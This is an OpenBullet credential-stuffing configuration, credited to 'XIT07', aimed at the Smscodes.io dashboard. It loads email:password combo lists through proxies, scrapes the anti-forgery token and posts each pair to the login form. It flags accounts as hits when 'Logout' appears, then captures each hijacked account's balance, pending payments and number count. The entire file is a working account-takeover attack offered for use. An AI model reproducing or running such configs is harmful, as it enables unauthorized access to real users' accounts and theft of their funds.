[SETTINGS]
{
  "Name": "Smscodes.io",
  "SuggestedBots": 20,
  "MaxCPM": 0,
  "LastModified": "2020-08-14T11:42:14.2531057+00:00",
  "AdditionalInfo": "Discord : XIT07#3692",
  "RequiredPlugins": [],
  "Author": "XIT07",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Get_Login REQUEST GET "https://dashboard.smscodes.io/Account/Login?ReturnUrl=%2F" 
  

#COOKIES PARSE "<COOKIES>" LR "" "" -> VAR "__RequestVerificationToken" 

PARSE "<SOURCE>" LR "<input name=\"__RequestVerificationToken\" type=\"hidden\" value=\"" "\" />" -> VAR "TOKEN" 

#Form_Login REQUEST POST "https://dashboard.smscodes.io/Account/Login?ReturnUrl=%2F" 
  CONTENT "__RequestVerificationToken=<TOKEN>&Email=<USER>&Password=<PASS>&RememberMe=false" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Host: dashboard.smscodes.io" 
  HEADER "Origin: https://dashboard.smscodes.io" 
  HEADER "Referer: https://dashboard.smscodes.io/Account/Login?ReturnUrl=%2F&ReturnUrl=%2F" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 

#Get_Dashboard REQUEST GET "https://dashboard.smscodes.io" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The Email field is not a valid e-mail address." 
  KEYCHAIN Success OR 
    KEY "Logout" 

#Balance PARSE "<SOURCE>" LR "<h3 class=\"text-pink\">$ <span class=\"counter\">" "</span></h3>" CreateEmpty=FALSE -> CAP "Balance: " 

#Pending_Payments PARSE "<SOURCE>" LR "<h3 class=\"text-success\"><span class=\"counter\">" "</span></h3>" CreateEmpty=FALSE -> CAP "Pending Payments" 

#Todays_Numbers PARSE "<SOURCE>" LR "<h3 class=\"text-warning\"><span class=\"counter\">" "</span></h3>" CreateEmpty=FALSE -> CAP "Todays Numbers" 

#Credit FUNCTION Constant "XIT07 â¤ï¸ðŸ˜" -> CAP "CONFIG BY :" 

